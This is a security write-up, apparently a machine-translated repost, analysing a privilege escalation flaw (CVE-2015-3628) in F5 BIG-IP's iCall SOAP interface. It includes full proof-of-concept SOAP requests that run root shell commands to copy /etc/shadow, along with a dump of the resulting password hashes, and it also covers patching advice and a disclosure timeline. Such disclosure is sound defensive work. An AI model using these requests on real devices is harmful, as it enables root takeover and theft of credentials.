Analysis of privilege escalation vulnerability using F5 ICall script (CVE-2015-3628)

Source: Internet
Author: User
Tags cve

Analysis of privilege escalation vulnerability using F5 ICall script (CVE-2015-3628)

Earlier this year, GDS found a vulnerability in F5 BIG-IP LTM that allows restricted users to access the system for extraction and remote command execution after successful Elevation of Privilege.

This article will show you how to manually exploit this vulnerability. Metasploit has also added corresponding modules. For details, see https://www.rapid7.com/db/modules/exploit/linux/http/f5_icall_cmd.

Summary

The problem with this vulnerability is that the SOAP interface is exposed to https: // iControl/iControlPortal. cgi (this small problem was previously encountered in the CVE-2014-2928 ). Attackers with valid Web interface access permissions and Resource Administrator roles can abuse the iCall SOAP function to execute arbitrary commands on the device as root.

You can use the iCall interface to create and run management scripts, which will be run by the Tcl interpreter as root. For specific affected versions, see F5 Security Advisory.

POC

The following describes how to view the "/etc/shadow" file (a file containing the password hash value on the device. Using the same method, we can also get a command line shell with the root permission.

For demonstration, we first create a user named "test" on the target device, whose password is "default" and has the role "Resource Administrator. This user is not allowed to use any shell.

The following http post request will create an iCall script on the target device. We will convert payload exec/bin/sh-c "id>/var/local/ucs/file. ucs; cat/etc/shadow>/var/local/ucs/file. ucs; chmod a + r/var/local/ucs/file. highlighted in red.

The script does not have any output. However, the script copies the "/etc/shadow" file to the directory where the backup configuration is stored. Here we can access it through the Web interface, which will be demonstrated later. At the same time, we recorded the output after the id command is executed to demonstrate that we are indeed running with the root permission.

Request:POST /iControl/iControlPortal.cgi HTTP/1.1Accept-Encoding: gzip,deflateContent-Type: text/xml;charset=UTF-8SOAPAction: urn:iControl:iCall/ScriptHost: 10.0.0.249Content-Length: 866Authorization: Basic dGVzdDpkZWZhdWx0= xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:scr="urn:iControl:iCall/Script" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">   soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">exploit xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">exec /bin/sh -c "id>/var/local/ucs/file.ucs;cat /etc/shadow >>/var/local/ucs/file.ucs;chmod a+r /var/local/ucs/file.ucs"  Response:HTTP/1.1 200 OKDate: Fri, 26 Jun 2015 14:30:32 GMTServer: ApacheSOAPServer: EasySoap++/0.6X-Frame-Options: SAMEORIGINContent-Type: text/xml; charset="UTF-8"Content-Length: 428 xmlns:E="http://schemas.xmlsoap.org/soap/envelope/"xmlns:A="http://schemas.xmlsoap.org/soap/encoding/"xmlns:s="http://www.w3.org/2001/XMLSchema-instance"xmlns:y="http://www.w3.org/2001/XMLSchema"xmlns:iControl="urn:iControl"E:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  xmlns:m="urn:iControl:iCall/Script">


 
Different types of processing methods are provided to execute the script iCall interface. In this case, PeriodicHandler is used to process the following requests.

POST /iControl/iControlPortal.cgi HTTP/1.1Accept-Encoding: gzip,deflateContent-Type: text/xml;charset=UTF-8SOAPAction: urn:iControl:iCall/PeriodicHandlerHost: 10.0.0.249Content-Length: 923Authorization: Basic dGVzdDpkZWZhdWx0= xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:per="urn:iControl:iCall/PeriodicHandler" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">   soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">exploitHandler  xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">/Common/exploit  xsi:type="urn:Common.ULongSequence" soapenc:arrayType="xsd:long[]" xmlns:urn="urn:iControl">30   Response:HTTP/1.1 200 OKDate: Fri, 26 Jun 2015 14:36:30 GMTServer: ApacheSet-Cookie: BIGIPAuthCookie=E41B1D179BD9DBF88AF1FF43F2390E5ED6BD6199; path=/; Secure;Set-Cookie: BIGIPAuthUsernameCookie=test; path=/; Secure;SOAPServer: EasySoap++/0.6X-Frame-Options: SAMEORIGINContent-Type: text/xml; charset="UTF-8"Content-Length: 428 xmlns:E="http://schemas.xmlsoap.org/soap/envelope/"xmlns:A="http://schemas.xmlsoap.org/soap/encoding/"xmlns:s="http://www.w3.org/2001/XMLSchema-instance"xmlns:y="http://www.w3.org/2001/XMLSchema"xmlns:iControl="urn:iControl"E:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  xmlns:m="urn:iControl:iCall/PeriodicHandler"> 
The script is executed every 30 seconds.

To view the file, you need to log on to the device and view it in System-> Archives, as shown below:


Download the file containing the command output. The result is as expected:
$ cat file.ucsuid=0(root) gid=0(root) context=system_u:system_r:init_troot:$1$8kIUIrbb$b7FOEXTrKOiOgJ1w0T78F/:16496:0:99999:7:::bin:*:16153::::::daemon:*:16153::::::adm:*:16153::::::lp:*:16153::::::mail:*:16153::::::uucp:*:16153::::::operator:*:16153::::::nobody:*:16153::::::tmshnobody:*:16153::::::admin:$1$VFlFWR0F$iIy0wXSbTl4EpmMYPnX1A.:16496:0:99999:7:::apache:!!:16153::::::mysql:!!:16153::::::vcsa:!!:16153::::::oprofile:!!:16153::::::sshd:!!:16153::::::syscheck:!!:16153::::::rpc:!!:16153::::::f5_remoteuser:!!:16153::::::pcap:!!:16153::::::tomcat:!!:16153::::::ntp:!!:16153::::::named:!!:16153::::::test:$1$SO17paaX$hNC27dZsBM9l3kSFuY/h9.:16500:0:99999:7:::

Repair

Patch. If the patch does not work, check whether the "Resource Administrator" role exists in all accounts. Update the configuration to only provide the minimum permission, at the same time, you must realize that the "Resource Administrator" role may have unrestricted permissions.

Disclosure timeline

-Vulnerability report to F5 Security Team

-F5 confirm the vulnerability and provide the affected version

-F5 updated version 12.0.0 fixed the Vulnerability

-F5 released version 11.5.3 HF2 fixed the Vulnerability

-F5 released version 11.6.0 HF6 fixed the Vulnerability

2015/11/19-Metasploit released attack modue

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.